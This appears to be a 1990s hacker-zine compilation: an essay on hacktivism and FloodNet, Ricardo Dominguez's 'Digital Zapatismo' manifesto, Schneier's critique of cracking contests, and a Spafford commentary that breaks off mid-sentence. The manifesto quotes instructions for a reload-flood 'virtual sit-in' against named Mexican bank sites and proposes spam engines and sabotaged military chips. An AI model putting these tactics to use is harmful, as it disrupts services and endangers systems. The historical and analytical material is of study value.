But within several hours of activating project SWARM, FloodNet was disabled. On web browsers Java coffee cups streamed quickly
across the bottom of the screen and FloodNet froze. Participants began to send email with word of trouble. Later that day a Wired
writer learned from a Department of Defense spokesperson that the DOD had taken some steps against FloodNet. At the same time, an
EDT co-founder received email that the Defense Information Systems Agency had complained about his ECD web site content.23

Globally, 20,000 connected to the FloodNet browser on September 9 and 10. This action reverberated through European media. It was
later picked up by Wired, ZDTV, Defense News, and National Public Radio, among others. On October 31, EDT made the front page
of the New York Times. The story continued to unfold. More interest from the media sphere. On November 22, EDT called for
FloodNet against the School of the Americas.24 As part of EDT's grande finale for the 1998 season, the group plans to release a public
version of FloodNet at 12:01 a.m. on January 1, 1999.

Politicized Hacking

Again mentioning Mexico, in addition to the Electronic Civil Disobedience style action directed at the surface, at the web site
entranceway, there have also been in 1998 actually hacks into Mexican government web sites where political messages have been added
to those sites. 25 This particular tactic of accessing and altering web sites seems to have been the popular tactic for this year. Probably
one of the most well known examples of this is the story of the young British hacker named "JF" who hacked into around 300 web sites
world wide and placed anti-nuclear imagery and text. This method has been tried by a number of groups. October issues of the Ottawa
Citizen and the New York Times did a decent job of capturing a number of these examples as they described this new trend. 26

One main distinction between most Politicized Hacking and the type of Electronic Civil Disobedience just mentioned is that while ECD
actors don’t hide their names, operating freely and above board, most political hacks are done by people who wish to remain
anonymous. It is also likely political hacks are done by individuals rather than by specific groups.

One of the reasons for the anonymity and secrecy is that the stakes are higher. Where proponents of forms of electronic civil
disobedience actions are perhaps in an ambiguous area of law, certain types of political hacks, used to varying degrees of success, are
unquestionably illegal. Few will question the legality of actually entering into an opponent's computer and adding or changing HTML
code.

This distinction speaks to a different style of organization. Because of the more secret, private, low key, and anonymous nature of the
politicized hacks, this type of activity expresses a different kind of politics. It is not the politics of mobilization, nor the politics that
requires mass participation. This is said not to pass judgement, but to illuminate that there are several important forms of direct action Net
politics already being shaped.

As touched on already, depending on the conception of politics, politicized hacking is either a recent phenomena or one that can be
traced back to hacking's origins. For the purposes of creating a portal to look into this world of extraparliamentarian direct action Net
politics, it may be useful to consider both perspectives. There is clearly something political about early hackers' desires to make
information free. It probably would be useful to examine the history of early to mid 1980s hacking to look for more political origins of
today's hacktivism. The computerized activism of the mid to late 1980s existed alongside the first generation of hackers. There may have
been cross-over then.

The contemporary conception of hacktivism seems to concern itself more with overtly political hacking. It is such a recent development
that journalists have only barely begun to discover it, while scholars have had little time to consider it. There are numerous web sites
devoted to hacking, but very few are devoted to Hacktivism per se. Although, one web site devoted to Hacktivism was created in the fall
of 1998 by a group called The Cult of the Dead Cow. 27

An important fact to realize and emphasize is that hacktivism, current forms of politicized hacking, is very much in its infancy. It is too
early to draw definitive conclusions or to make strong predictions as to the direction it will take. Perhaps we can point to certain
trajectories and make some logical projections. But we need to remember that at this point there is no consensus or agreement. Maybe
the entire notion of hacktivism confuses and challenges sets of values and hacker codes of ethics. Quite possibly there is some re-thinking
happening and we might begin to see a new set of ethical codes for hacking.28

Resistance to Future War

Some call the 1990-1991 Gulf War the first Information War because of the heavy military reliance on information and communication
technology. The Gulf War was a pinnacle of achievement for the weapons industry, a chance to battle test sophisticated hardware that
had been developed and manufactured under the Reagan and Bush presidencies. The weapons systems were dependent, as were all
communications, on a major telecommunications infrastructure involving satellite, radar, radio, and telephone. The "smart" bombs were
just the most mentioned of the sophisticated weaponry that was showcased during the made-for-CNN war.

Although significantly under-reported by mainstream U.S. media, there was sizeable domestic opposition to the Gulf War, both prior to
and especially during the first days of U.S. bombing of Iraq. In San Francisco, the first three days of the Gulf War are referred to as the
Three Days of Rage. During that period, demonstrators filled, occupied, and controlled the streets and in some cases bridges and
highways in the greater San Francisco Bay Area. Similar disruptions happened up and down the west coast and all across the country.
There was widespread grassroots resistance to the U.S. bombardment of Iraq in January 1991.29

One part of that history is the role of information and communication technology, not just for the military forces, but also for the
grassroots resistance. If the Gulf War is indicative of a paradigmatic shift toward the practice of Information Warfare, then it's also useful
to look at the way in which ICT enabled resistance to the war effort. Some people within the opposition to the 1990-1991 Gulf War
used email to communicate and they learned about resistance in other cities through Bulletin Board Systems and newsgroups. Others
without computer access used fax and telephone. But many people had no connection to computers and received nothing by fax, instead
they came out into the streets because of seeing posters or by hearing announcements on TV or on radio, or through word of mouth. It is
safe to say that the Internet played only a marginal role in spreading news and moving people into action. The opposition to the war also
watched CNN just like everyone else.

But that was the end of 1990 and the very beginning of 1991, 8 years ago at the time of this writing, and in a pre-Web phase and even
pre-Internet phase. Yes, by then the PC revolution had exploded and more and more people were buying modems, but the Gulf War is
clearly positioned in the pre-boom days of the Internet in the United States. An interesting question is what would happen today, or
moreover, what might happen tomorrow or in the near future, if presented with a similar set of circumstances. What if, for example, a
Gulf War-like scenario emerged at the end of the year 2000 and the beginning of 2001? Suppose the United States decided to engage in
what became an unpopular war, what might hacktivism look like in a condition of more generalized resistance? Or said another way,
what might generalized resistance look like with the condition of hacktivism?

The above is what is meant to be asked by suggesting that Resistance to Future War is the fifth portal into direct action Net politics.
Where might this all lead? Until now, incidents of hacktivity have been sporadic and basically unconnected. Hacktivist events have been
singular and not connected to a set of simultaneous occurrences. Perhaps the Electronic Disturbance Theater's work demonstrates the
possibility of waging a campaign on the Internet, and sustaining a presence over a period of time. But the group's one goal of a SWARM
has yet to be achieved. Maybe it is useful to think of the SWARM metaphor in the consideration of Resistance to Future War.

Perhaps a SWARM is a convergence of generalized resistance, referring to a situation in which there are not just isolated cases, or
several pockets of opposition, but when there is across-the-board resistance occurring at a number of different levels and happening in
cities and towns all across the country, all at the same time. Such was the case during moments of domestic Gulf War resistance. There
was a simultaneous outpouring of people into the streets who engaged in quite a range of activity, both legal and illegal. A multitude of
tactics were being used at the same time but without any central command or directing orders from above. Incidents of such upsurge are
rare, but they undoubtedly will occur again. What will hacktivism look like then? What of it when hacktivism moves from isolated
incidents to a convergence of allied forces? Is this when hacktivism ceases to be and becomes cyberspacial resistance? While it may be
too early to make accurate predictions, it seems true that the force or power of hacktivism has yet to be fully recognized or tested. Yet
before getting lost in futuristic science fiction, consider some critiques.

Emerging Critiques of Direct Action Net Politics

There is no consensus among social and political activists regarding electronic civil disobedience, political hacking, hacktivism, or more
generally extraparliamentarian direct action Net politics. It may in fact be too early to judge or to make definitive claims about these new
tactics, but some critiques have co-developed along with the development of these new methods. They point to some basic questions
over the effectiveness and appropriateness of these forms of electronic action.

In an emerging discourse on several email listservs, that is too complicated to treat fairly in such a short piece as this one, there have been
periodic criticisms raised both generally and specifically about aspects of the above mentioned tactics.30 By no means can this piece
attempt to describe and comment on all criticisms being raised about hacktivism et al, but it can at least address several of the criticism
raised that seem most important. As already stated there are critiques aimed at the effectiveness and the appropriateness of
cyber-protests. In terms of effectiveness, three closely related types of questions have appeared regarding political, tactical, and technical
effectiveness. Concerning appropriateness there are ethical questions, that may be also considered as political questions, and of course
there are legal questions. Some of the legal concerns raise issues of enforceability and prosecuteability.

Political and tactical effectiveness are closely intertwined. Are these methods of computerized activism effective? The answer to which is,
that it depends on how effectiveness is defined. What is effective? If the desired goal of hacktivism is to draw attention to particular issues
by engaging in actions that are unusual and will attract some degree of media coverage, then effectiveness can be seen as being high. If,
however, effectiveness is measured in terms of assessing the actions ability to be a catalyst for fomenting a more profound mobilization of
people, then probably these new techniques are not effective. This distinction then, perhaps, is important. Hacktivism is not likely to be an
organizing tool and the end result of hacktivity is not likely to be an increase in the ranks of the disaffected. Rather hacktivism appears to
be a means to augment or supplement existing organizing efforts, a way to make some noise and focus attention.

Technical critiques of hacktivism at the level of computer code are another way of addressing the efficacy of these new methods.
Undoubtedly there will be disagreement as to how effective a particular technique is or isn't. But it seems that if new methods are created
in an environment of experimentation, then valid critiques will be taken into consideration and used to redesign or alter plans and
strategies. However, there are some technical critiques that are actually much more ideologically based than it would first seem. For
example there is a certain tendency to reify bandwidth and from that viewpoint any action that clogs or diminishes bandwidth is
considered negative. So then, technical critiques can be value-laden with particular stances toward the Internet infrastructure.

Despite the current levels of political, tactical, and technical questions that are being raised about hacktivism et al, it seems to be an area
that is in a period of expansion, rather than contraction. And it generally seems that this critique and questioning is healthy and useful for
the refinement of the practice.

As just mentioned, some technical critiques are bound together with ideological pre-dispositions and are therefore also political questions,
and perhaps even ethical questions of appropriateness. To judge blocking a web site, or clogging the pipelines leading up to a web site, is
to take an ethical position. If the judgement goes against such activity, such an ethical position is likely to be derived from an ethical code
that values free and open access to information. But there are alternative sets of values that justifies, for example, the blocking of access
to web sites. These differences in beliefs over the nature of the Internet infrastructure are among people who are basically on the same
side when it comes to most political questions. Some of these differences will probably be worked out as the subject and practice
matures, while there may remain clear divisions.

Last but not least, the more prosecutorial minded are apt to pass judgement on the appropriateness or inappropriateness of certain forms
of hacktivism based on where the actions stand with respect to the law. While it is true that some forms of hacktivity are fairly easy to see
as being outside the bounds of law - such as entering into systems to destroy data - there are other forms that are more ambiguous and
hover much closer to the boundary between the legal and the illegal. Coupled with this ambiguity are other factors that tend to cloud the
enforceability or prosecuteability of particular hacktivist offenses. Jurisdictional factors are key here. The nature of cyberspace is
extraterritorial. People can easily act across geographic political borders, as those borders do not show themselves in the terrain. Law
enforcement is still bound to particular geographic zones. So there is a conflict between the new capabilities of political actors and the old
system to which the law is still attached. This is already beginning to change and legal frameworks, at the international level, will be
mapped on to cyberspace.

This section does not do justice to the full range of critiques that can be identified and described, and further exploration of the subject of
direct action Net politics should make sure such a deeper analysis is taken. The intention here has been more so to develop a greater
understanding of these new forms of electronic action and to only mention a few overarching critiques so as to not give the impression
that this is moving forward without resistance. Quite the contrary is true. It seems that hacktivity has met and will meet resistance from
many quarters. It doesn't seem as if opposition to hacktivist ideas and practices falls along particular ideological lines either.

Conclusion

Several things seem to be clear at this point. The first is that hacktivism, as defined across the full spectrum from relatively harmless
computerized activism to potentially dangerous resistance to future war, is a phenomena that is on the rise. Second, as just eluded to,
hacktivism represents a spectrum of possibilities that exists in some combination of word and deed. On the one end of the spectrum is
pure word. On the other end of the spectrum is pure deed. Computerized activism hovers closer to pure word, while the successive
portals moves closer toward pure deed. Third, along with this tendency towards transgression, towards giving value to actions that move
beyond words and that sees the Internet infrastructure also as a site for action, there comes with this a critique and resistance. Despite
this critique hacktivism is likely to continue to spread, but perhaps modified to accommodate some of the criticism. Fourth, with its
continued spread, modified by critique or not, hacktivism is also likely to continue to gain attention. While media coverage may eventually
drop off if or when hacktivism becomes more commonplace, at this point the way in which hacktivism is being represented is still new
enough to warrant media attention for the foreseeable near future.

What remains unclear about hacktivism emerges when we start to ask questions like: what does this mean and where is this going? While
we can claim with a fair degree of certainty that hacktivism is on the rise, there is little way to tell where it will lead to and the significance
or lack there of that it will or might obtain. Moreover, there are aspects of hacktivism that still need to be explored. For example, the
entire issue of extraterritoriality, of the Internet not being bound to any particular geographic region and the difficulties that poses for law
enforcement, is one area that deserves further attention.

One reason why it is difficult to get a firm grip on hacktivism's direction, in addition to simply saying that it is too early to tell, is that
hacktivism will evolve in response to changing global economic and political conditions. As it is hard to predict trends and directions in
the global economy, it too, then, becomes hard to predict events that will be linked to those meta shifts.

Nevertheless, some people are trying to understand and make sense out of where hacktivism could go, although they might not be doing
so using the particular word 'hacktivism' to describe this activity. Governments and corporations are keenly concerned, for example,
about network security. To get some indications about the forecast for hacktivism in the 21st century it may be very useful to examine
what these sorts of institutions are saying and how they are preparing to defend themselves.

It could very well be that governments might impose severe regimes that successfully curtail hacktivism. If so, 1998 might be seen at
some point as the glory days, when hacktivist experiments were able to go largely unchallenged, because the mechanisms of the state had
not yet been in place to deal with the new phenomena. Or it could be that hacktivism is able to successfully remain several steps out in
front of law enforcement efforts, or that too many people become involved that enforceability remains problematic. Again, it is difficult to
know any of this.

Finally, while we can speak with some clarity about facets of hacktivism and also point to aspects of it that remain ambiguous and
unforeseen, there is an overarching concern that comes from this discussion that deserves more attention. Specifically arising out of the
consideration of the fifth portal, Resistance to Future War, what are the long term consequences posed for governments and states if
individuals, non-state actors, can engage in forms of cyberspacial resistance across traditional geo-political borders? This is an important
question raised by this discussion and one that demands more attention to answer properly. But it seems clear already that we are at the
onset of a new way of thinking about, participating in, and resisting war, and that today's nascent hacktivity is part of the trajectory
towards that new way.


Footnotes

1. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31
October 1998, sec. A1; Same in Carmin Karasic scrapbook
(http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html)
2. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of
Communication 39, no. 3 (Summer 1989): 154-62.
3. Harry Cleaver, "The Zapatistas and the International Circulation of Struggle: Lessons Suggested and
Problems Raised," Harry Cleaver homepage 1998 (http://www.eco.utexas.edu/faculty/Cleaver/lessons.html)
4. Kenneth L. Hacker, "Missing links in the evolution of electronic democratization," Media, Culture &
Society 18, (1996): 213-32; Lewis A. Friedland, "Electronic democracy and the new citizenship," Media,
Culture & Society 18, (1996): 185-212; John Street, "Remote Control? Politics, Technology and
'Electronic Democracy'," European Journal of Communication 12, no. 1 (1997): 27-42.
5. John D. H Downing, "Computers for Political Change: PeaceNet and Public Data Access," Journal of
Communication 39, no. 3 (Summer 1989): 154-62.
6. Linda M. Harasim, ed., Global Networks: Computers and International Communication (Cambridge,
Mass.: MIT Press 1993)
7. There are many protest web sites. Trying a search on keywords "protest" and "web site" and there
will be thousands of hits.
8. John Arquilla and David Ronfeldt, "Cyberwar is Coming!," Comparative Strategy 12 (April-June 1993):
141-65.; (http://gopher.well.sf.ca.us:70/0/Military/cyberwar)
9. Cleaver, Harry "The Zapatistas and The Electronic Fabric of Struggle," Harry Cleaver homepage 1995
(http://www.eco.utexas.edu/faculty/Cleaver/zaps.html)
10. Gerfried Stocker and Christine Schopf, eds. InfoWar (Wien, Austria: Springer 1998); Ars
Electronica Festival 1998 (http://www.aec.at/infowar)
11. Stefan Wray, "Towards Bottom-Up Information Warfare: Theory and Practice: Version 1.0," Electronic
Civil Disobedience Archive 1998 (http://www.nyu.edu/projects/wray/BottomUp.html) 12. Stefan Wray, "The
Drug War and Information Warfare in Mexico," Masters Thesis, University of Texas at Austin, Electronic
Civil Disobedience Archive 1997 (http://www.nyu.edu/projects/wray/masters.html)
13. La Jornada (http://serpiente.dgsca.unam.mx/jornada/index.html)
14. Harry Cleaver, "Zapatistas in Cyberspace: An Accion Zapatista Report," Harry Cleaver homepage 1998
(http://www.eco.utexas.edu/faculty/Cleaver/zapsincyber.html)
15. No specific reference to this fact. But it is a matter of record.
16. Stefan Wray, "On Electronic Civil Disobedience," Peace Review 11, no. 1, (1999), forthcoming;
Electronic Civil Disobedience archive 1998 (http://www.nyu.edu/projects/wray/oecd.html)
17. Critical Art Ensemble, The Electronic Disturbance (Brooklyn, NY: Autonomedia 1994); Critical Art
Ensemble, Electronic Civil Disobedience and Other Unpopular Ideas (Brooklyn, NY: Autonomedia 1996);
Critical Art Ensemble homepage (http://mailer.fsu.edu/~sbarnes/)
18. Stefan Wray, "Paris Salon or Boston Tea Party? Recasting Electronic Democracy, A View from
Amsterdam," Electronic Civil Disobedience archive 1998
(http://www.nyu.edu/projects/wray/teaparty.html)
19. Electronic Disturbance Theater homepage (http://www.thng.net/~rdom/ecd/ecd.html)
20. Brett Stalbaum, "The Zapatista Tactical FloodNet," Electronic Civil Disobedience Web Page 1998
(http://www.nyu.edu/projects/wray/ZapTactFlood.html)
21. Ricardo Dominguez, "SWARM: An ECD Project for Ars Electronica Festival '98," Ricardo Dominguez
homepage 1998 (http://www.thing.net/~rdom/)
22. Electronic Disturbance Theater, "Chronology of SWARM,"
(http://www.nyu.edu/projects/wray/CHRON.html)
23. "Email Message From DISA to NYU Computer Security," Electronic Civil Disobedience homepage
(http://www.nyu.edu/projects/wray/memo.html)
24. Electronic Disturbance Theater's call for Electronic Civil Disobedience on November 22, 1998
(http://www.thing.net/~rdom/ecd/November22.html); (http://www.thing.net/~rdom/ecd/block.html)
25. "Mexico rebel supporters hack government home page," Reuters, 4 February 1998; Same in Electronic
Civil Disobedience homepage (http://www.nyu.edu/projects/wray/real.html)
26. Amy Harmon, "'Hacktivists' of All Persuasions Take Their Struggle to the Web," New York Times, 31
October 1998, sec. A1; Same in Carmin Karasic scrapbook
(http://custwww.xensei.com/users/carmin/scrapbook/nyt103198/31hack.html); Bob Paquin, "E-Guerrillas in
the mist," The Ottawa Citizen, 26 October 1998
(http://www.ottawacitizen.com/hightech/981026/1964496.html)
27. Hacktivism web page (http://www.hacktivism.org); Cult of the Dead Cow homepage
(http://www.cultdeadcow.com/)
28. While it is possible to point to certain early hacker ethical codes that, for example, privilege
free and open access to all, there is not a monolithic hacker's perspective. Nevertheless, some whom
call themselves hackers have criticized the FloodNet project because one of the things they allege it
does is block bandwidth. This view can be said to be a digitally correct position.
29. The author knows about grassroots resistance to the 1990/1991 Gulf War because he was involved in
anti-war organizing and action in the San Francisco Bay Area during this period.
30.Some of these listservs include: nyfma@tao.ca, damn-org@tao.ca, media-l@tao.ca,
accion-zapatista@mcfeeley.cc.utexas.edu


SP.02 "Digital Zapatismo"
~~~~~~~~~~~~~~~~~~~

Digital Zapatismo

http://www.freespeech.org/resistance/texts/DigZap.html
by Ricardo Dominguez
http://www.thing.net/~rdom/


Zapatismo has infected the political body of Mexico's "perfect dictatorship" since January 1, 1994. This polyspacial movement for a radical democracy based on the Mayan legacies of
dialogue ripped into the electronic fabric not as InfoWar--but as virtual actions for real peace in the real communities of Chiapas. As of September 1997 reports of The Mexican military
training and arming paramilitary groups with the intent of moving the "low-intensity" war to higher level began to circulate among the Zapatista Network. It took the massacres at Acteal
to focus the world on something that was already known--the constant tragedy of late-capital.

As manifestations took place around the world in remembrance of the Acteal dead on January 1 and 2nd, the Mexican military with the full support of the PRI government began the next
stage of the war against peace. As the West stumbled about in celebration of a new year--the first report reached out across the net and slapped us awake once more with the brutal
reality of the neo-liberal agenda.

1.0 Beta Actions

This time Zapatista Networks responded with a new level of electronic civil disobedience beyond the passing of information and emailing presidents. On Sunday the 18th of January 1998
a call for NetStriking for Zapata (from Anonymous Digital Coalition) came in via email with the following instructions:

In solidarity with the Zapatista movement we welcome all netsurfers with ideals of justice, freedom, solidarity and liberty within their hearts, to a virtual sit-in. On January 29, 1998 from
4:00 p.m. GMT (Greenwich Mean Time) to 5:00 p.m. (in the following five web sites, symbols of Mexican neoliberalism):

Bolsa Mexicana de Valores: http://www.bmv.com.mx
Grupo Financiero Bital: http://www.bital.com.mx
Grupo Financiero Bancomer: http://www.bancomer.com.mx
Banco de Mexico: http://www.banxico.org.mx
Banamex: http://www.banamex.com

Technical instructions: Connect with your browser to the upper mentioned web sites and push the bottom "reload" several times for an hour (with in between an interval of few seconds).

This virtual sit-in not only brought the possibilities of direct electronic actions to the forefront of the Zapatista networks, it also initiated a more focused analysis of what methods of
electronic civil disobedience might work. Several questions were brought up on the issues of net traffic, ISPs, and small international pipes. Speculations on the technological
implications of these actions began to focus on questions of Who is most likely to be damaged by this move? The Mexican target banks or the Internet Service Providers, ISPs, who
route data to these banks?

As these discussions were taking place a group of Mexican digital activist on February 4, 1998 hacked into a Mexican government home page on the Internet and placed pro-Zapatista
slogans on the front pages of the site. Soon afterwards an MS Dos Ping Action program from the ECD group arrived to hit Mexican Banks and Chase Manhattan Bank on February 9.

The next level of possible ECD began to emerge at the end of February: an automatic mail engine from the New Humans and Java based site that automatically began to PING the Britsh
Mexican Embassy URL every 7 seconds once you logged-in.

2.0 InfoWar

To move beyond these Beta actions we need to map the general condition of InfoWar at this shifting point in time.

Command and control systems (CCS) within the Military and Intelligence Communities have been re-shifting their definition of war for sometime. That surveillance systems like Project
Echelon would become a priority is no surprise. The NSA (National Security Agency) and the (NRO) National Reconnaissance Office have been working on implementing new functions
for themselves since the end of the post-Cold War.

They had to re-invent themselves into hyper-surveillance networks that can accomplish defensive intelligence gathering and rapid containment missions for the lowest cost possible.
Now it is more
important to attack an opponents information infrastructure, than it is to destroy its armies. Actions, like the Gulf War, are now only useful for limited screenal political gambits.

The enemy is now hosted by the global public commercial networks. InfoWar tactics must now maintain a constant analysis of all information flows and a continuous tracking of the
backbone routes. In search of the most effective way to bring down specific zones of resistance within an enemies political or economic structures:


1. Commercial communication systems.
2. Broadcasting networks.
3. Financial data systems.
4. Transportation systems
5. Internet Server networks.

Of course one of the problems faced by these IW scenarios is that military and intelligence systems here are also routed within public commercial lines.

The scenarios of possible implosions faced by the decentralization of command and control are increasing at a co-equal rate with the speed of access to hardware, software, and training.
Late Capital demands that this equation grow even faster and to the farthest reaches of the globe.
The necessity of the rule of association and strategic coalitions between military and intelligence networks with mega corporation webs, universities, independent ISP´s, electronic
political cells, individual research and analysis creates a general state of pan-anarchy.

Thus IWW (Information World War) has already started and it is haunted by its own shadow. It must face the task of dealing with an open network that has at least 5 vulnerabilities:


1. Bottom-up architecture.

2. Multiple distribution points.

3. Memetic networks (MMN): independent networks which coordinate without the unification of a central command.

4. Non linearity and complexity effects: where simple interactions lead to unpredictable outcomes.

5. Constant states of emergency: all systems are always already not enough and must be constantly upgraded.

In order to deal with this growing vulnerability of the electronic infrastructure with the on set InfoWar. The State has redefined command, control, intelligence and resistance. InfoWar
tactics are now moving beyond the theoretical questions about the rise of "network power" and the end of hierarchies. Instead, Military and Intelligence groups are now experimenting
with pragmatic hybrid structures that can retain control over networks, while allowing network autonomy to expand within a specific types of command structures. In order to contain the
rising soft power of small groups that can organize themselves "into sprawling networks" threatening hard power structures.

3.0 Hacking the Future

Digital Zapatismo has always been an open system of sprawling networks—this has been the force multiplier of the movement. It used digital cultures most basic system of exchange,
e-mail between people to disturb the Informatic State. Now that we know that they are using, as we always suspected, hyper-surveillance filters to regain control of the network.

We must begin to invent other methods of Electronic Civil Disobedience:


1. Alternative networks with more access and bandwidth. More projects like Name.space attacking the control of the root.name structures by Internic.

2. Deep programming: Creating Spiders, Bots, and other (minor network agents) to move against specific URLs without interrupting the Server. The first Zapatista Spider should
be available by the end of May.

3. Offshore Domains: To maintain spamming engines for massive e-mail actions.

4. Virtual proximity capabilities: Create simple access systems for Real Time intercontinental electronic communication. These types of systems would disable the possibility of
surveillance. A proto-type has been developed by Thing.net—The Thing Connector 3.0.

5. Satellites: To gather a fund among alternative networks to buy our own Satellite. Giving us autonomy from controlled networks and backbones. The Nettime community has
been discussing the possibility.

6. Jamming Chips: Jamming by cells of highly trained cells could systematically disrupt wide areas of sensitive networks. These micro-squads could slip basic disturbances into
the chips bought by the U.S military-entertainment complex from foreign countries. Many of these elements are part of a wide range of defensive and offensive weapon
systems--that could induce a general dysfunction in performance at a pre-set time.

The Zapatista Networks, in the spirit of Chiapas are developing methods of electronic disturbance as sites of invention and political action for peace. At this point in time it is difficult to
know how much of a disturbance these acts of electronic civil disobedience specifically make. What we do know is that neoliberal power is extremely concerned by these acts.

Since Jan 1, 1994 the analysis of the Zapatista Electronic Movement has been at the top of the list of the Military and Intelligence research agenda. For now all we can do is continue to
forge ahead and always remember that all of this electronic activism is about a real community in search of a real peace. A community that has been calling for a world the makes all worlds
possible.

@copyleft


Electronic Civil Disobedience Homepage


@HWA


SP.C1 The Phallusy of cracking contests, (how big is yours?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


The Fallacy of Cracking Contests


You see them all the time: "Company X offers $1,000,000 to anyone who can
break through their firewall/crack their algorithm/make a fraudulent
transaction using their protocol/do whatever." These are cracking
contests, and they're supposed to show how strong and secure the target of
the contests are. The logic goes something like this: We offered a prize
to break the target, and no one did. This means that the target is secure.


It doesn't.


Contests are a terrible way to demonstrate security. A
product/system/protocol/algorithm that has survived a contest unbroken is
not obviously more trustworthy than one that has not been the subject of a
contest. The best products/systems/protocols/algorithms available today
have not been the subjects of any contests, and probably never will be.
Contests generally don't produce useful data. There are three basic
reasons why this is so.


1. The contests are generally unfair.


Cryptanalysis assumes that the attacker knows everything except the secret.
He has access to the algorithms and protocols, the source code,
everything. He knows the ciphertext and the plaintext. He may even know
something about the key.


And a cryptanalytic result can be anything. It can be a complete break: a
result that breaks the security in a reasonable amount of time. It can be
a theoretical break: a result that doesn't work "operationally," but still
shows that the security isn't as good as advertised. It can be anything in
between.


Most cryptanalysis contests have arbitrary rules. They define what the
attacker has to work with, and how a successful break looks. Jaws
Technologies provided a ciphertext file and, without explaining how their
algorithm worked, offered a prize to anyone who could recover the
plaintext. This isn't how real cryptanalysis works; if no one wins the
contest, it means nothing.


Most contests don't disclose the algorithm. And since most cryptanalysts
don't have the skills for reverse-engineering (I find it tedious and
boring), they never bother analyzing the systems. This is why COMP128,
CMEA, ORYX, the Firewire cipher, the DVD cipher, and the Netscape PRNG were
all broken within months of their disclosure (despite the fact that some of
them have been widely deployed for many years); once the algorithm is
revealed, it's easy to see the flaw, but it might take years before someone
bothers to reverse-engineer the algorithm and publish it. Contests don't
help.


(Of course, the above paragraph does not hold true for the military. There
are countless examples successful reverse-engineering--VENONA, PURPLE--in
the "real" world. But the academic world doesn't work that way,
fortunately or unfortunately.)


Unfair contests aren't new. Back in the mid-1980s, the authors of an
encryption algorithm called FEAL issued a contest. They provided a
ciphertext file, and offered a prize to the first person to recover the
plaintext. The algorithm has been repeatedly broken by cryptographers,
through differential and then linear cryptanalysis and by other statistical
attacks. Everyone agrees that the algorithm was badly flawed. Still, no
one won the contest.


2. The analysis is not controlled.


Contests are random tests. Do ten people, each working 100 hours to win
the contest, count as 1000 hours of analysis? Or did they all try the same
things? Are they even competent analysts, or are they just random people
who heard about the contest and wanted to try their luck? Just because no
one wins a contest doesn't mean the target is secure...it just means that
no one won.


3. Contest prizes are rarely good incentives.


Cryptanalysis of an algorithm, protocol, or system can be a lot of work.

     People who are good at it are going to do the work for a variety of 
reasons--money, prestige, boredom--but trying to win a contest is rarely
one of them. Contests are viewed in the community with skepticism: most
companies that sponsor contests are not known, and people don't believe
that they will judge the results fairly. And trying to win a contest is no
sure thing: someone could beat you, leaving you nothing to show for your
efforts. Cryptanalysts are much better off analyzing systems where they
are being paid for their analysis work, or systems for which they can
publish a paper explaining their results.


Just look at the economics. Taken at a conservative $125 an hour for a
competent cryptanalyst, a $10K prize pays for two weeks of work, not enough
time to even dig through the code. A $100K prize might be worth a look,
but reverse-engineering the product is boring and that's still not enough
time to do a thorough job. A prize of $1M starts to become interesting,
but most companies can't afford to offer that. And the cryptanalyst has no
guarantee of getting paid: he may not find anything, he may get beaten to
the attack and lose out to someone else, or the company might not even pay.
Why should a cryptanalyst donate his time (and good name) to the company's
publicity campaign?


Cryptanalysis contests are generally nothing more than a publicity tool.
Sponsoring a contest, even a fair one, is no guarantee that people will
analyze the target. Surviving a contest is no guarantee that there are no
flaws in the target.


The true measure of trustworthiness is how much analysis has been done, not
whether there was a contest. And analysis is a slow and painful process.
People trust cryptographic algorithms (DES, RSA), protocols (Kerberos), and
systems (PGP, IPSec) not because of contests, but because all have been
subjected to years (decades, even) of peer review and analysis. And they
have been analyzed not because of some elusive prize, but because they were
either interesting or widely deployed. The analysis of the fifteen AES
candidates is going to take several years. There isn't a prize in the
world that's going to make the best cryptanalysts drop what they're doing
and examine the offerings of Meganet Corporation or RPK Security Inc., two
companies that recently offered cracking prizes. It's much more
interesting to find flaws in Java, or Windows NT, or cellular telephone
security.


The above three reasons are generalizations. There are exceptions, but
they are few and far between. The RSA challenges, both their factoring
challenges and their symmetric brute-force challenges, are fair and good
contests. These contests are successful not because the prize money is an
incentive to factor numbers or build brute-force cracking machines, but
because researchers are already interested in factoring and brute-force
cracking. The contests simply provide a spotlight for what was already an
interesting endeavor. The AES contest, although more a competition than a
cryptanalysis contest, is also fair


Our Twofish cryptanalysis contest offers a $10K prize for the best negative
comments on Twofish that aren't written by the authors. There are no
arbitrary definitions of what a winning analysis is. There is no
ciphertext to break or keys to recover. We are simply rewarding the most
successful cryptanalysis research result, whatever it may be and however
successful it is (or is not). Again, the contest is fair because 1) the
algorithm is completely specified, 2) there are no arbitrary definition of
what winning means, and 3) the algorithm is public domain.


Contests, if implemented correctly, can provide useful information and
reward particular areas of research. But they are not useful metrics to
judge security. I can offer $10K to the first person who successfully
breaks into my home and steals a book off my shelf. If no one does so
before the contest ends, that doesn't mean my home is secure. Maybe no one
with any burgling ability heard about my contest. Maybe they were too busy
doing other things. Maybe they weren't able to break into my home, but
they figured out how to forge the real-estate title to put the property in
their name. Maybe they did break into my home, but took a look around and
decided to come back when there was something more valuable than a $10,000
prize at stake. The contest proved nothing.


SP.C2 Hacker challenges: Boon or Bane by Gene Spafford
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hacker Challenges -- Boon or Bane?

(From Cipher, an infowar publication located at
http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/old-issues/issue9602 - Ed)

Commentary by Gene Spafford, with responses from Sameer Parekh,
Jon Wiederspan, and Jeff Weinstein
______________________________________________________________________
In the past year, several businesses have made resources publicly available on
the Internet and challenged all comers to find bugs in them or break into them.
Incentives offered to those who reported valid break-ins or bugs have ranged
from T-shirts to cold cash. Recently, Gene Spafford of Purdue University
decried this growing practice in a message circulated widely on the Internet.
Cipher has obtained responses from some of the organizations who have
sponsored challenges of one sort or another, and circulating them along with
that note. We thank Prof. Spafford and the organizations who responded to our
request for comments.

A Few Comments on "Hacker Challenges"
+++++++++++++++++++++++++++++++++++++
by Eugene H. Spafford, COAST Laboratory Director, Purdue University
http://www.cs.purdue.edu/people/spaf

I note with dismay the increasing number of "hacker challenges" used in
marketing security products. I think these are actually harmful to the
profession and practice of security, rather than helpful. I believe the
harm comes in two ways: (1) the challenges don't serve as any real test
of the products, and it denigrates security professionals by suggesting
that they should accept them as proof of security; and (2) it helps
